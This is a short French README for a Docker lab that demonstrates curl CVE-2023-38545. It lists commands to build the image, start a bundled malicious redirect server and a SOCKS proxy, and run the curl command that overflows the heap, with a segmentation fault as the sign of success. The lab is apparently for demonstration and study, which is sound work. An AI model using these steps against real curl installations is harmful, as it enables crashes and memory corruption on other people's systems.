
Dockerfile contenant tous les fichiers de configuration nécessaires pour démontrer l'exploit.
Ceci présente la cURL CVE-2023-38545. C'est aussi léger que possible.
Tout d'abord, construisez l'image Docker :
docker build . -t cveimage
Ensuite, exécutez simplement le fichier image, créant un conteneur Docker temporaire qui sera supprimé une fois le conteneur arrêté :
docker run --rm --tty --net="host" --name cvecontainer cveimage
Si vous avez du mal à taper les commandes, ouvrez simplement un autre terminal et exécutez :
docker exec -it cvecontainer /bin/bash
Maintenant, nous devons démarrer tous les services. Connectez-vous au conteneur déjà en cours d'exécution et exécutez :
./exploit/malicious_redirect_server.sh &
python3 /exploit/proxy.py &
Maintenant, depuis l'intérieur du conteneur, vous pouvez voir l'exploit cURL en action :
curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000
Vous devez voir une erreur de segmentation fault sur la machine qui a exécuté la commande curl pour savoir que l'exploit a réussi. Si vous ne la voyez pas, soit l'exploit ne s'est pas produit, soit le processus avait tellement d'espace de heap disponible que vous n'avez pas écrasé la mémoire inaccessible.